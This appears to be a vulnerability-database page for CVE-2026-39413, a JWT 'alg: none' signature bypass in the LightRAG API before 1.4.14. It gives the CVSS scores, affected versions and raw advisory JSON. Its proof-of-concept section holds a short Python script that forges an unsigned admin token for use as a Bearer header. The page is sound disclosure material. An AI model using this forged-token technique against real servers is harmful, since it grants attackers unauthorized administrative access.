Security Vulnerability Report
中文
CVE-2026-39413 CVSS 4.2 MEDIUM

CVE-2026-39413

Published: 2026-04-08 20:16:26
Last Modified: 2026-04-22 16:16:58
Source: [email protected]

Description

LightRAG provides simple and fast retrieval-augmented generation. Prior to 1.4.14, the LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the jwt.decode() call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access. This vulnerability is fixed in 1.4.14.

CVSS Details

CVSS Score
4.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hkuds:lightrag:*:*:*:*:*:*:*:* - VULNERABLE
LightRAG < 1.4.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import jwt import datetime # Target payload claiming to be an admin payload = { 'sub': 'admin', 'role': 'administrator', 'iat': datetime.datetime.utcnow(), 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1) } # Forge the token using the 'none' algorithm # No secret key is required for the 'none' algorithm malicious_token = jwt.encode(payload, key='', algorithm='none') print(f"Forged Token: {malicious_token}") # Usage example (in a real attack, send this token in the Authorization header) # headers = {'Authorization': f'Bearer {malicious_token}'}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39413", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:25.877", "lastModified": "2026-04-22T16:16:58.387", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "LightRAG provides simple and fast retrieval-augmented generation. Prior to 1.4.14, the LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the jwt.decode() call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access. This vulnerability is fixed in 1.4.14."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hkuds:lightrag:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.14", "matchCriteriaId": "80A2BB57-B14C-4542-8F7F-D0D6F20AFC31"}]}]}], "references": [{"url": "https://github.com/HKUDS/LightRAG/security/advisories/GHSA-8ffj-4hx4-9pgf", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/github/advisory-database/issues/7373", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.